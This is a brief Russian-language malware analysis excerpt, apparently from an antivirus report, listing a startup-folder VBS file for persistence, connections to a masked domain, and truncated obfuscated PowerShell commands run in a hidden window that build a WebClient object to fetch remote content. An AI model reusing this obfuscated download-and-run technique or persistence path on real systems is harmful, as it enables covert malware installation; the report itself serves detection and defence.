Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\google.vbs
- 'go##el.com':443
- 'go##el.com':443
- DNS ASK go##el.com
- '<SYSTEM32>\cmd.exe' /c PowerSheLl $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerSheLl $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'c'+'l'+'...